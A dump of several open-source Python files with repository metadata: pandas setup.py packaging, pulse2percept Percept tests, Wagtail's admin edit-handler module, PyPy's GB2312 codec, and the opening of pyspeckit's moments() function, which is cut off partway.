'pandas.tests.io.json',
'pandas.tests.io.parser',
'pandas.tests.io.sas',
'pandas.tests.io.msgpack',
'pandas.tests.io.formats',
'pandas.tests.groupby',
'pandas.tests.reshape',
'pandas.tests.series',
'pandas.tests.scalar',
'pandas.tests.tseries',
'pandas.tests.tseries.offsets',
'pandas.tests.plotting',
'pandas.tests.tools',
'pandas.tests.util',
'pandas.tools',
'pandas.tseries',
],
package_data={'pandas.tests': ['data/*.csv'],
'pandas.tests.indexes': ['data/*.pickle'],
'pandas.tests.io': ['data/legacy_hdf/*.h5',
'data/legacy_pickle/*/*.pickle',
'data/legacy_msgpack/*/*.msgpack',
'data/*.csv*',
'data/*.dta',
'data/*.pickle',
'data/*.txt',
'data/*.xls',
'data/*.xlsx',
'data/*.xlsm',
'data/*.table',
'parser/data/*.csv',
'parser/data/*.gz',
'parser/data/*.bz2',
'parser/data/*.txt',
'parser/data/*.tar',
'parser/data/*.zip',
'parser/data/*.tar.gz',
'sas/data/*.csv',
'sas/data/*.xpt',
'sas/data/*.sas7bdat',
'data/*.html',
'data/html_encoding/*.html',
'json/data/*.json*'],
'pandas.tests.io.formats': ['data/*.csv'],
'pandas.tests.io.msgpack': ['data/*.mp'],
'pandas.tests.reshape': ['data/*.csv'],
'pandas.tests.tseries.offsets': ['data/*.pickle'],
'pandas.io.formats': ['templates/*.tpl']
},
ext_modules=extensions,
maintainer_email=EMAIL,
description=DESCRIPTION,
license=LICENSE,
cmdclass=cmdclass,
url=URL,
download_url=DOWNLOAD_URL,
long_description=LONG_DESCRIPTION,
classifiers=CLASSIFIERS,
platforms='any',
**setuptools_kwargs)
|
bsd-3-clause
|
mbeyeler/pulse2percept
|
pulse2percept/percepts/tests/test_base.py
|
1
|
6272
|
import os
import numpy as np
import pytest
import numpy.testing as npt
import matplotlib.pyplot as plt
from matplotlib.axes import Subplot
from matplotlib.animation import FuncAnimation
from imageio import mimread
from skimage import img_as_float
from skimage.io import imread
from pulse2percept.percepts import Percept
from pulse2percept.utils import Grid2D
def test_Percept():
# Automatic axes:
ndarray = np.arange(15).reshape((3, 5, 1))
percept = Percept(ndarray, metadata='meta')
npt.assert_equal(percept.shape, ndarray.shape)
npt.assert_equal(percept.metadata, 'meta')
npt.assert_equal(hasattr(percept, 'xdva'), True)
npt.assert_almost_equal(percept.xdva, np.arange(ndarray.shape[1]))
npt.assert_equal(hasattr(percept, 'ydva'), True)
npt.assert_almost_equal(percept.ydva, np.arange(ndarray.shape[0]))
# Singleton dimensions can be None:
npt.assert_equal(hasattr(percept, 'time'), True)
npt.assert_equal(percept.time, None)
# Specific labels:
percept = Percept(ndarray, time=0.4)
npt.assert_almost_equal(percept.time, [0.4])
percept = Percept(ndarray, time=[0.4])
npt.assert_almost_equal(percept.time, [0.4])
# Labels from a grid.
y_range = (-1, 1)
x_range = (-2, 2)
grid = Grid2D(x_range, y_range)
percept = Percept(ndarray, space=grid)
npt.assert_almost_equal(percept.xdva, grid._xflat)
npt.assert_almost_equal(percept.ydva, grid._yflat)
npt.assert_equal(percept.time, None)
grid = Grid2D(x_range, y_range)
percept = Percept(ndarray, space=grid, time=0)
npt.assert_almost_equal(percept.xdva, grid._xflat)
npt.assert_almost_equal(percept.ydva, grid._yflat)
npt.assert_almost_equal(percept.time, [0])
with pytest.raises(TypeError):
Percept(ndarray, space={'x': [0, 1, 2], 'y': [0, 1, 2, 3, 4]})
def test_Percept__iter__():
ndarray = np.zeros((2, 4, 3))
ndarray[..., 1] = 1
ndarray[..., 2] = 2
percept = Percept(ndarray)
for i, frame in enumerate(percept):
npt.assert_equal(frame.shape, (2, 4))
npt.assert_almost_equal(frame, i)
def test_Percept_argmax():
percept = Percept(np.arange(30).reshape((3, 5, 2)))
npt.assert_almost_equal(percept.argmax(), 29)
npt.assert_almost_equal(percept.argmax(axis="frames"), 1)
with pytest.raises(TypeError):
percept.argmax(axis=(0, 1))
with pytest.raises(ValueError):
percept.argmax(axis='invalid')
def test_Percept_max():
percept = Percept(np.arange(30).reshape((3, 5, 2)))
npt.assert_almost_equal(percept.max(), 29)
npt.assert_almost_equal(percept.max(axis="frames"),
percept.data[..., 1])
npt.assert_almost_equal(percept.max(),
percept.data.ravel()[percept.argmax()])
npt.assert_almost_equal(percept.max(axis='frames'),
percept.data[..., percept.argmax(axis='frames')])
with pytest.raises(TypeError):
percept.max(axis=(0, 1))
with pytest.raises(ValueError):
percept.max(axis='invalid')
def test_Percept_get_brightest_frame():
percept = Percept(np.arange(30).reshape((3, 5, 2)))
npt.assert_almost_equal(percept.get_brightest_frame(),
percept.data[..., 1])
def test_Percept_plot():
y_range = (-1, 1)
x_range = (-2, 2)
grid = Grid2D(x_range, y_range)
percept = Percept(np.arange(15).reshape((3, 5, 1)), space=grid)
# Basic usage of pcolor:
ax = percept.plot(kind='pcolor')
npt.assert_equal(isinstance(ax, Subplot), True)
npt.assert_almost_equal(ax.axis(), [*x_range, *y_range])
frame = percept.get_brightest_frame()
npt.assert_almost_equal(ax.collections[0].get_clim(),
[frame.min(), frame.max()])
# Basic usage of hex:
ax = percept.plot(kind='hex')
npt.assert_equal(isinstance(ax, Subplot), True)
npt.assert_almost_equal(ax.axis(), [percept.xdva[0], percept.xdva[-1],
percept.ydva[0], percept.ydva[-1]])
npt.assert_almost_equal(ax.collections[0].get_clim(),
[percept.data[..., 0].min(),
percept.data[..., 0].max()])
# Verify color map:
npt.assert_equal(ax.collections[0].cmap, plt.cm.gray)
# Specify figsize:
ax = percept.plot(kind='pcolor', figsize=(6, 4))
npt.assert_almost_equal(ax.figure.get_size_inches(), (6, 4))
# Test vmin and vmax
ax.clear()
ax = percept.plot(vmin=2, vmax=4)
npt.assert_equal(ax.collections[0].get_clim(), (2., 4.))
# Invalid calls:
with pytest.raises(ValueError):
percept.plot(kind='invalid')
with pytest.raises(TypeError):
percept.plot(ax='invalid')
@pytest.mark.parametrize('n_frames', (2, 3, 10, 14))
def test_Percept_play(n_frames):
ndarray = np.random.rand(2, 4, n_frames)
percept = Percept(ndarray)
ani = percept.play()
npt.assert_equal(isinstance(ani, FuncAnimation), True)
npt.assert_equal(len(list(ani.frame_seq)), n_frames)
@pytest.mark.parametrize('dtype', (np.float32, np.uint8))
def test_Percept_save(dtype):
ndarray = np.arange(256, dtype=dtype).repeat(31).reshape((-1, 16, 16))
percept = Percept(ndarray.transpose((2, 0, 1)))
# Save multiple frames as a gif or movie:
for fname in ['test.mp4', 'test.avi', 'test.mov', 'test.wmv', 'test.gif']:
print(fname)
percept.save(fname)
npt.assert_equal(os.path.isfile(fname), True)
# Normalized to [0, 255] with some loss of precision:
mov = mimread(fname)
npt.assert_equal(np.min(mov) <= 2, True)
npt.assert_equal(np.max(mov) >= 250, True)
os.remove(fname)
    # A multi-frame percept cannot be saved as a still image:
fname = 'test.jpg'
with pytest.raises(ValueError):
percept.save(fname)
    # But a single frame can be saved as an image:
percept = Percept(ndarray[..., :1])
for fname in ['test.jpg', 'test.png', 'test.tif', 'test.gif']:
percept.save(fname)
npt.assert_equal(os.path.isfile(fname), True)
img = img_as_float(imread(fname))
npt.assert_almost_equal(np.min(img), 0, decimal=3)
npt.assert_almost_equal(np.max(img), 1.0, decimal=3)
os.remove(fname)
|
bsd-3-clause
|
nealtodd/wagtail
|
wagtail/admin/edit_handlers.py
|
2
|
28509
|
import functools
import re
from django import forms
from django.core.exceptions import ImproperlyConfigured
from django.db.models.fields import FieldDoesNotExist
from django.forms.formsets import DELETION_FIELD_NAME, ORDERING_FIELD_NAME
from django.forms.models import fields_for_model
from django.template.loader import render_to_string
from django.utils.functional import cached_property
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy
from taggit.managers import TaggableManager
from wagtail.admin import compare, widgets
from wagtail.core.fields import RichTextField
from wagtail.core.models import Page
from wagtail.core.utils import camelcase_to_underscore, resolve_model_string
from wagtail.utils.decorators import cached_classmethod
# DIRECT_FORM_FIELD_OVERRIDES, FORM_FIELD_OVERRIDES are imported for backwards
# compatibility, as people are likely importing them from here and then
# appending their own overrides
from .forms.models import ( # NOQA
DIRECT_FORM_FIELD_OVERRIDES, FORM_FIELD_OVERRIDES, WagtailAdminModelForm, formfield_for_dbfield)
from .forms.pages import WagtailAdminPageForm
def widget_with_script(widget, script):
return mark_safe('{0}<script>{1}</script>'.format(widget, script))
def get_form_for_model(
model, form_class=WagtailAdminModelForm,
fields=None, exclude=None, formsets=None, exclude_formsets=None, widgets=None
):
# django's modelform_factory with a bit of custom behaviour
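    # Compared to modelform_factory, this also threads 'formsets' and
    # 'exclude_formsets' through to the generated Meta, which the ClusterForm
    # machinery behind WagtailAdminModelForm reads when building child formsets.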
attrs = {'model': model}
if fields is not None:
attrs['fields'] = fields
if exclude is not None:
attrs['exclude'] = exclude
if widgets is not None:
attrs['widgets'] = widgets
if formsets is not None:
attrs['formsets'] = formsets
if exclude_formsets is not None:
attrs['exclude_formsets'] = exclude_formsets
# Give this new form class a reasonable name.
class_name = model.__name__ + str('Form')
bases = (object,)
if hasattr(form_class, 'Meta'):
bases = (form_class.Meta,) + bases
form_class_attrs = {
'Meta': type(str('Meta'), bases, attrs)
}
metaclass = type(form_class)
return metaclass(class_name, (form_class,), form_class_attrs)
def extract_panel_definitions_from_model_class(model, exclude=None):
if hasattr(model, 'panels'):
return model.panels
panels = []
_exclude = []
if exclude:
_exclude.extend(exclude)
fields = fields_for_model(model, exclude=_exclude, formfield_callback=formfield_for_dbfield)
for field_name, field in fields.items():
try:
panel_class = field.widget.get_panel()
except AttributeError:
panel_class = FieldPanel
panel = panel_class(field_name)
panels.append(panel)
return panels
class EditHandler:
"""
Abstract class providing sensible default behaviours for objects implementing
the EditHandler API
"""
def __init__(self, heading='', classname='', help_text=''):
self.heading = heading
self.classname = classname
self.help_text = help_text
self.model = None
self.instance = None
self.request = None
self.form = None
def clone(self):
return self.__class__(**self.clone_kwargs())
def clone_kwargs(self):
return {
'heading': self.heading,
'classname': self.classname,
'help_text': self.help_text,
}
    # return a dict of widget overrides that this EditHandler wants to be in
    # place on the form it receives
def widget_overrides(self):
return {}
# return list of fields that this EditHandler expects to find on the form
def required_fields(self):
return []
# return a dict of formsets that this EditHandler requires to be present
# as children of the ClusterForm; the dict is a mapping from relation name
# to parameters to be passed as part of get_form_for_model's 'formsets' kwarg
def required_formsets(self):
return {}
# return any HTML that needs to be output on the edit page once per edit handler definition.
# Typically this will be used to define snippets of HTML within <script type="text/x-template"></script> blocks
# for Javascript code to work with.
def html_declarations(self):
return ''
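    # bind_to() returns a clone of this handler bound to whichever of
    # model / instance / request / form are supplied, firing the matching
    # on_*_bound() hook for each piece of context that becomes available.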
def bind_to(self, model=None, instance=None, request=None, form=None):
if model is None and instance is not None and self.model is None:
model = instance._meta.model
new = self.clone()
new.model = self.model if model is None else model
new.instance = self.instance if instance is None else instance
new.request = self.request if request is None else request
new.form = self.form if form is None else form
if new.model is not None:
new.on_model_bound()
if new.instance is not None:
new.on_instance_bound()
if new.request is not None:
new.on_request_bound()
if new.form is not None:
new.on_form_bound()
return new
def on_model_bound(self):
pass
def on_instance_bound(self):
pass
def on_request_bound(self):
pass
def on_form_bound(self):
pass
def __repr__(self):
return '<%s with model=%s instance=%s request=%s form=%s>' % (
self.__class__.__name__,
self.model, self.instance, self.request, self.form.__class__.__name__)
def classes(self):
"""
Additional CSS classnames to add to whatever kind of object this is at output.
Subclasses of EditHandler should override this, invoking super().classes() to
append more classes specific to the situation.
"""
if self.classname:
return [self.classname]
return []
def field_type(self):
"""
        The kind of field this is, e.g. boolean_field. Useful for more semantic markup of the field display based on its type.
"""
return ""
def id_for_label(self):
"""
The ID to be used as the 'for' attribute of any <label> elements that refer
to this object but are rendered outside of it. Leave blank if this object does not render
as a single input field.
"""
return ""
def render_as_object(self):
"""
Render this object as it should appear within an ObjectList. Should not
include the <h2> heading or help text - ObjectList will supply those
"""
# by default, assume that the subclass provides a catch-all render() method
return self.render()
def render_as_field(self):
"""
Render this object as it should appear within a <ul class="fields"> list item
"""
# by default, assume that the subclass provides a catch-all render() method
return self.render()
def render_missing_fields(self):
"""
Helper function: render all of the fields that are defined on the form but not "claimed" by
any panels via required_fields. These fields are most likely to be hidden fields introduced
by the forms framework itself, such as ORDER / DELETE fields on formset members.
(If they aren't actually hidden fields, then they will appear as ugly unstyled / label-less fields
outside of the panel furniture. But there's not much we can do about that.)
"""
rendered_fields = self.required_fields()
missing_fields_html = [
str(self.form[field_name])
for field_name in self.form.fields
if field_name not in rendered_fields
]
return mark_safe(''.join(missing_fields_html))
def render_form_content(self):
"""
Render this as an 'object', ensuring that all fields necessary for a valid form
submission are included
"""
return mark_safe(self.render_as_object() + self.render_missing_fields())
def get_comparison(self):
return []
class BaseCompositeEditHandler(EditHandler):
"""
Abstract class for EditHandlers that manage a set of sub-EditHandlers.
Concrete subclasses must attach a 'children' property
"""
def __init__(self, children=(), *args, **kwargs):
super().__init__(*args, **kwargs)
self.children = children
def clone_kwargs(self):
kwargs = super().clone_kwargs()
kwargs['children'] = self.children
return kwargs
def widget_overrides(self):
        # collate the widget override dicts from all children
        widgets = {}
        for handler in self.children:
            widgets.update(handler.widget_overrides())
        return widgets
def required_fields(self):
fields = []
for handler in self.children:
fields.extend(handler.required_fields())
return fields
def required_formsets(self):
formsets = {}
        for handler in self.children:
            formsets.update(handler.required_formsets())
return formsets
def html_declarations(self):
return mark_safe(''.join([c.html_declarations() for c in self.children]))
def on_model_bound(self):
self.children = [child.bind_to(model=self.model)
for child in self.children]
def on_instance_bound(self):
self.children = [child.bind_to(instance=self.instance)
for child in self.children]
def on_request_bound(self):
self.children = [child.bind_to(request=self.request)
for child in self.children]
def on_form_bound(self):
children = []
for child in self.children:
if isinstance(child, FieldPanel):
if self.form._meta.exclude:
if child.field_name in self.form._meta.exclude:
continue
if self.form._meta.fields:
if child.field_name not in self.form._meta.fields:
continue
children.append(child.bind_to(form=self.form))
self.children = children
def render(self):
return mark_safe(render_to_string(self.template, {
'self': self
}))
def get_comparison(self):
comparators = []
for child in self.children:
comparators.extend(child.get_comparison())
return comparators
class BaseFormEditHandler(BaseCompositeEditHandler):
"""
Base class for edit handlers that can construct a form class for all their
child edit handlers.
"""
# The form class used as the base for constructing specific forms for this
# edit handler. Subclasses can override this attribute to provide a form
# with custom validation, for example. Custom forms must subclass
# WagtailAdminModelForm
base_form_class = None
def get_form_class(self):
"""
Construct a form class that has all the fields and formsets named in
the children of this edit handler.
"""
if self.model is None:
raise AttributeError(
'%s is not bound to a model yet. Use `.bind_to(model=model)` '
'before using this method.' % self.__class__.__name__)
# If a custom form class was passed to the EditHandler, use it.
# Otherwise, use the base_form_class from the model.
# If that is not defined, use WagtailAdminModelForm.
model_form_class = getattr(self.model, 'base_form_class',
WagtailAdminModelForm)
base_form_class = self.base_form_class or model_form_class
return get_form_for_model(
self.model,
form_class=base_form_class,
fields=self.required_fields(),
formsets=self.required_formsets(),
widgets=self.widget_overrides())
class TabbedInterface(BaseFormEditHandler):
template = "wagtailadmin/edit_handlers/tabbed_interface.html"
def __init__(self, *args, **kwargs):
self.base_form_class = kwargs.pop('base_form_class', None)
super().__init__(*args, **kwargs)
def clone_kwargs(self):
kwargs = super().clone_kwargs()
kwargs['base_form_class'] = self.base_form_class
return kwargs
class ObjectList(TabbedInterface):
template = "wagtailadmin/edit_handlers/object_list.html"
class FieldRowPanel(BaseCompositeEditHandler):
template = "wagtailadmin/edit_handlers/field_row_panel.html"
def on_instance_bound(self):
super().on_instance_bound()
col_count = ' col%s' % (12 // len(self.children))
# If child panel doesn't have a col# class then append default based on
# number of columns
for child in self.children:
if not re.search(r'\bcol\d+\b', child.classname):
child.classname += col_count
class MultiFieldPanel(BaseCompositeEditHandler):
template = "wagtailadmin/edit_handlers/multi_field_panel.html"
def classes(self):
classes = super().classes()
classes.append("multi-field")
return classes
class HelpPanel(EditHandler):
def __init__(self, content='', template='wagtailadmin/edit_handlers/help_panel.html',
heading='', classname=''):
super().__init__(heading=heading, classname=classname)
self.content = content
self.template = template
def clone_kwargs(self):
kwargs = super().clone_kwargs()
del kwargs['help_text']
kwargs.update(
content=self.content,
template=self.template,
)
return kwargs
def render(self):
return mark_safe(render_to_string(self.template, {
'self': self
}))
class FieldPanel(EditHandler):
TEMPLATE_VAR = 'field_panel'
def __init__(self, field_name, *args, **kwargs):
widget = kwargs.pop('widget', None)
if widget is not None:
self.widget = widget
super().__init__(*args, **kwargs)
self.field_name = field_name
def clone_kwargs(self):
kwargs = super().clone_kwargs()
kwargs.update(
field_name=self.field_name,
widget=self.widget if hasattr(self, 'widget') else None,
)
return kwargs
def widget_overrides(self):
"""check if a specific widget has been defined for this field"""
if hasattr(self, 'widget'):
return {self.field_name: self.widget}
return {}
def classes(self):
classes = super().classes()
if self.bound_field.field.required:
classes.append("required")
if self.bound_field.errors:
classes.append("error")
classes.append(self.field_type())
return classes
def field_type(self):
return camelcase_to_underscore(self.bound_field.field.__class__.__name__)
def id_for_label(self):
return self.bound_field.id_for_label
object_template = "wagtailadmin/edit_handlers/single_field_panel.html"
def render_as_object(self):
return mark_safe(render_to_string(self.object_template, {
'self': self,
self.TEMPLATE_VAR: self,
'field': self.bound_field,
}))
field_template = "wagtailadmin/edit_handlers/field_panel_field.html"
def render_as_field(self):
return mark_safe(render_to_string(self.field_template, {
'field': self.bound_field,
'field_type': self.field_type(),
}))
def required_fields(self):
return [self.field_name]
def get_comparison_class(self):
# Hide fields with hidden widget
widget_override = self.widget_overrides().get(self.field_name, None)
if widget_override and widget_override.is_hidden:
return
try:
field = self.db_field
if field.choices:
return compare.ChoiceFieldComparison
if field.is_relation:
if isinstance(field, TaggableManager):
return compare.TagsFieldComparison
elif field.many_to_many:
return compare.M2MFieldComparison
return compare.ForeignObjectComparison
if isinstance(field, RichTextField):
return compare.RichTextFieldComparison
except FieldDoesNotExist:
pass
return compare.FieldComparison
def get_comparison(self):
comparator_class = self.get_comparison_class()
if comparator_class:
try:
return [functools.partial(comparator_class, self.db_field)]
except FieldDoesNotExist:
return []
return []
@cached_property
def db_field(self):
try:
model = self.model
except AttributeError:
raise ImproperlyConfigured("%r must be bound to a model before calling db_field" % self)
return model._meta.get_field(self.field_name)
def on_form_bound(self):
self.bound_field = self.form[self.field_name]
self.heading = self.bound_field.label
self.help_text = self.bound_field.help_text
def __repr__(self):
return "<%s '%s' with model=%s instance=%s request=%s form=%s>" % (
self.__class__.__name__, self.field_name,
self.model, self.instance, self.request, self.form.__class__.__name__)
class RichTextFieldPanel(FieldPanel):
def get_comparison_class(self):
return compare.RichTextFieldComparison
class BaseChooserPanel(FieldPanel):
"""
Abstract superclass for panels that provide a modal interface for choosing (or creating)
a database object such as an image, resulting in an ID that is used to populate
a hidden foreign key input.
Subclasses provide:
* field_template (only required if the default template of field_panel_field.html is not usable)
* object_type_name - something like 'image' which will be used as the var name
for the object instance in the field_template
"""
def get_chosen_item(self):
field = self.instance._meta.get_field(self.field_name)
related_model = field.remote_field.model
try:
return getattr(self.instance, self.field_name)
except related_model.DoesNotExist:
            # if the ForeignKey is null=False, Django raises DoesNotExist here
            # rather than returning None as other unpopulated field types do,
            # so normalise that case to None
return
def render_as_field(self):
instance_obj = self.get_chosen_item()
context = {
'field': self.bound_field,
self.object_type_name: instance_obj,
'is_chosen': bool(instance_obj), # DEPRECATED - passed to templates for backwards compatibility only
}
return mark_safe(render_to_string(self.field_template, context))
class PageChooserPanel(BaseChooserPanel):
object_type_name = "page"
def __init__(self, field_name, page_type=None, can_choose_root=False):
super().__init__(field_name=field_name)
if page_type:
# Convert single string/model into list
if not isinstance(page_type, (list, tuple)):
page_type = [page_type]
else:
page_type = []
self.page_type = page_type
self.can_choose_root = can_choose_root
def clone_kwargs(self):
return {
'field_name': self.field_name,
'page_type': self.page_type,
'can_choose_root': self.can_choose_root,
}
def widget_overrides(self):
return {self.field_name: widgets.AdminPageChooser(
target_models=self.target_models(),
can_choose_root=self.can_choose_root)}
def target_models(self):
if self.page_type:
target_models = []
for page_type in self.page_type:
try:
target_models.append(resolve_model_string(page_type))
except LookupError:
raise ImproperlyConfigured(
"{0}.page_type must be of the form 'app_label.model_name', given {1!r}".format(
self.__class__.__name__, page_type
)
)
except ValueError:
raise ImproperlyConfigured(
"{0}.page_type refers to model {1!r} that has not been installed".format(
self.__class__.__name__, page_type
)
)
return target_models
return [self.db_field.remote_field.model]
class InlinePanel(EditHandler):
def __init__(self, relation_name, panels=None, heading='', label='',
min_num=None, max_num=None, *args, **kwargs):
super().__init__(*args, **kwargs)
self.relation_name = relation_name
self.panels = panels
self.heading = heading or label
self.label = label
self.min_num = min_num
self.max_num = max_num
def clone_kwargs(self):
kwargs = super().clone_kwargs()
kwargs.update(
relation_name=self.relation_name,
panels=self.panels,
label=self.label,
min_num=self.min_num,
max_num=self.max_num,
)
return kwargs
def get_panel_definitions(self):
# Look for a panels definition in the InlinePanel declaration
if self.panels is not None:
return self.panels
# Failing that, get it from the model
return extract_panel_definitions_from_model_class(
self.db_field.related_model,
exclude=[self.db_field.field.name]
)
def get_child_edit_handler(self):
panels = self.get_panel_definitions()
child_edit_handler = MultiFieldPanel(panels, heading=self.heading)
return child_edit_handler.bind_to(model=self.db_field.related_model)
def required_formsets(self):
child_edit_handler = self.get_child_edit_handler()
return {
self.relation_name: {
'fields': child_edit_handler.required_fields(),
'widgets': child_edit_handler.widget_overrides(),
'min_num': self.min_num,
'validate_min': self.min_num is not None,
'max_num': self.max_num,
'validate_max': self.max_num is not None
}
}
def html_declarations(self):
return self.get_child_edit_handler().html_declarations()
def get_comparison(self):
field_comparisons = []
for panel in self.get_panel_definitions():
field_comparisons.extend(
panel.bind_to(model=self.db_field.related_model)
.get_comparison())
return [functools.partial(compare.ChildRelationComparison, self.db_field, field_comparisons)]
def on_model_bound(self):
manager = getattr(self.model, self.relation_name)
self.db_field = manager.rel
def on_form_bound(self):
self.formset = self.form.formsets[self.relation_name]
self.children = []
for subform in self.formset.forms:
# override the DELETE field to have a hidden input
subform.fields[DELETION_FIELD_NAME].widget = forms.HiddenInput()
# ditto for the ORDER field, if present
if self.formset.can_order:
subform.fields[ORDERING_FIELD_NAME].widget = forms.HiddenInput()
child_edit_handler = self.get_child_edit_handler()
self.children.append(child_edit_handler.bind_to(
instance=subform.instance, request=self.request, form=subform))
# if this formset is valid, it may have been re-ordered; respect that
# in case the parent form errored and we need to re-render
if self.formset.can_order and self.formset.is_valid():
self.children.sort(
key=lambda child: child.form.cleaned_data[ORDERING_FIELD_NAME] or 1)
empty_form = self.formset.empty_form
empty_form.fields[DELETION_FIELD_NAME].widget = forms.HiddenInput()
if self.formset.can_order:
empty_form.fields[ORDERING_FIELD_NAME].widget = forms.HiddenInput()
self.empty_child = self.get_child_edit_handler()
self.empty_child = self.empty_child.bind_to(
instance=empty_form.instance, request=self.request, form=empty_form)
template = "wagtailadmin/edit_handlers/inline_panel.html"
def render(self):
formset = render_to_string(self.template, {
'self': self,
'can_order': self.formset.can_order,
})
js = self.render_js_init()
return widget_with_script(formset, js)
js_template = "wagtailadmin/edit_handlers/inline_panel.js"
def render_js_init(self):
return mark_safe(render_to_string(self.js_template, {
'self': self,
'can_order': self.formset.can_order,
}))
# This allows users to include the publishing panel in their own per-model override
# without having to write these fields out by hand, potentially losing 'classname'
# and therefore the associated styling of the publishing panel
class PublishingPanel(MultiFieldPanel):
def __init__(self, **kwargs):
updated_kwargs = {
'children': [
FieldRowPanel([
FieldPanel('go_live_at'),
FieldPanel('expire_at'),
], classname="label-above"),
],
'heading': ugettext_lazy('Scheduled publishing'),
'classname': 'publishing',
}
updated_kwargs.update(kwargs)
super().__init__(**updated_kwargs)
# Now that we've defined EditHandlers, we can set up wagtailcore.Page to have some.
Page.content_panels = [
FieldPanel('title', classname="full title"),
]
Page.promote_panels = [
MultiFieldPanel([
FieldPanel('slug'),
FieldPanel('seo_title'),
FieldPanel('show_in_menus'),
FieldPanel('search_description'),
], ugettext_lazy('Common page configuration')),
]
Page.settings_panels = [
PublishingPanel()
]
Page.base_form_class = WagtailAdminPageForm
@cached_classmethod
def get_edit_handler(cls):
"""
Get the EditHandler to use in the Wagtail admin when editing this page type.
"""
if hasattr(cls, 'edit_handler'):
edit_handler = cls.edit_handler
else:
# construct a TabbedInterface made up of content_panels, promote_panels
# and settings_panels, skipping any which are empty
tabs = []
if cls.content_panels:
tabs.append(ObjectList(cls.content_panels,
heading=ugettext_lazy('Content')))
if cls.promote_panels:
tabs.append(ObjectList(cls.promote_panels,
heading=ugettext_lazy('Promote')))
if cls.settings_panels:
tabs.append(ObjectList(cls.settings_panels,
heading=ugettext_lazy('Settings'),
classname='settings'))
edit_handler = TabbedInterface(tabs, base_form_class=cls.base_form_class)
return edit_handler.bind_to(model=cls)
Page.get_edit_handler = get_edit_handler
class StreamFieldPanel(FieldPanel):
def classes(self):
classes = super().classes()
classes.append("stream-field")
# In case of a validation error, BlockWidget will take care of outputting the error on the
# relevant sub-block, so we don't want the stream block as a whole to be wrapped in an 'error' class.
if 'error' in classes:
classes.remove("error")
return classes
def html_declarations(self):
return self.block_def.all_html_declarations()
def get_comparison_class(self):
return compare.StreamFieldComparison
def id_for_label(self):
# a StreamField may consist of many input fields, so it's not meaningful to
# attach the label to any specific one
return ""
def on_model_bound(self):
super().on_model_bound()
self.block_def = self.db_field.stream_block
|
bsd-3-clause
|
bussiere/pypyjs
|
website/demo/home/rfk/repos/pypy/lib-python/2.7/encodings/gb2312.py
|
816
|
1027
|
#
# gb2312.py: Python Unicode Codec for GB2312
#
# Written by Hye-Shik Chang <perky@FreeBSD.org>
#
import _codecs_cn, codecs
import _multibytecodec as mbc
codec = _codecs_cn.getcodec('gb2312')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
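# getregentry() is looked up by the codecs machinery (via the encodings
# package's search function) when the 'gb2312' codec is requested.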
def getregentry():
return codecs.CodecInfo(
name='gb2312',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
|
mit
|
low-sky/pyspeckit
|
pyspeckit/spectrum/moments.py
|
4
|
4902
|
from __future__ import print_function
import numpy as np
def moments(Xax, data, vheight=True, estimator=np.mean, negamp=None,
veryverbose=False, nsigcut=None, noise_estimate=None, **kwargs):
"""
    Returns the Gaussian parameters of a 1D distribution by calculating its
    moments. Depending on the input parameters, only a subset of the values
    listed under Returns is produced.
Theory, from first principles (in the absence of noise):
integral(gaussian) = sqrt(2*pi*sigma^2) * amp
sigma = integral / amp / sqrt(2*pi)
In the presence of noise, this gets much more complicated.
The noisy approach is inspired by `mpfit
<http://cow.physics.wisc.edu/~craigm/idl/fitting.html>`_
Parameters
----------
Xax : np.ndarray
The x-axis for computing the 1st and 2nd moments
data : np.ndarray
The data from which to compute the various moments
estimator : function
A function to estimate the "height" or "background level" of the data,
e.g. mean or median. If masked arrays are being used, use the np.ma
versions of the numpy functions
    negamp : bool or None
        Force the peak negative (True), positive (False), or the sign of the
        peak will be "autodetected" (negamp=None)
    nsigcut : float or None
        If specified, the code will attempt to estimate the noise and only use
        data above/below `n`-sigma above the noise. The noise will be estimated
        from the data unless the noise is specified with `noise_estimate`
    noise_estimate : float or None
        Guess for the noise value. Only matters if `nsigcut` is specified.
vheight : bool
Include an estimate of the background level?
Returns
-------
(height, amplitude, x, width_x)
height : float
is the background level
amplitude : float
is the maximum (or minimum) of the data after background subtraction
x : float
is the first moment
width_x : float
is the second moment
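    Examples
    --------
    A minimal sketch, assuming a noiseless Gaussian sampled on a regular grid
    (the values here are illustrative only)::
        import numpy as np
        x = np.linspace(-5, 5, 1001)
        data = 3.0 * np.exp(-x**2 / (2 * 1.5**2))  # amp=3, center=0, sigma=1.5
        height, amp, xcen, width = moments(x, data, vheight=True)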
"""
Xax = np.array(Xax)
    # Guard against degenerate input: constant data (and, below, data that is
    # entirely masked) has no meaningful moments, so bail out early.
if (data.min() == data.max()):
return [0]*(3+vheight)
    elif hasattr(data, 'mask'):
        # an (essentially) fully masked array is likewise unusable
if data.mask.sum() > data.shape[0]-1:
return [0]*(3+vheight)
dx = np.abs(np.mean(np.diff(Xax))) # assume a regular grid
integral = (data*dx).sum()
height = estimator(data)
if noise_estimate is None:
noise_estimate = data.std()
height_cut_low = height-nsigcut*noise_estimate if nsigcut is not None else height
height_cut_high = height+nsigcut*noise_estimate if nsigcut is not None else height
# try to figure out whether pos or neg based on the minimum width of the pos/neg peaks
data_gt_low = data>height_cut_low
data_lt_low = data<height_cut_low
Lpeakintegral = integral - height_cut_low*(data_lt_low).sum()*dx - (data[data_gt_low]*dx).sum()
Lamplitude = data.min()-height
Lwidth_x = Lpeakintegral / Lamplitude / np.sqrt(2*np.pi)
data_gt_high = data>height_cut_high
data_lt_high = data<height_cut_high
Hpeakintegral = integral - height*(data_gt_high).sum()*dx - (data[data_lt_high]*dx).sum()
Hamplitude = data.max()-height
Hwidth_x = Hpeakintegral / Hamplitude / np.sqrt(2*np.pi)
# in order to guess properly, needs to be mean by default
# rev 824 broke this for test_hr2421
Lstddev = Xax[data<estimator(data)].std()
Hstddev = Xax[data>estimator(data)].std()
#print("Lstddev: %10.3g Hstddev: %10.3g" % (Lstddev,Hstddev))
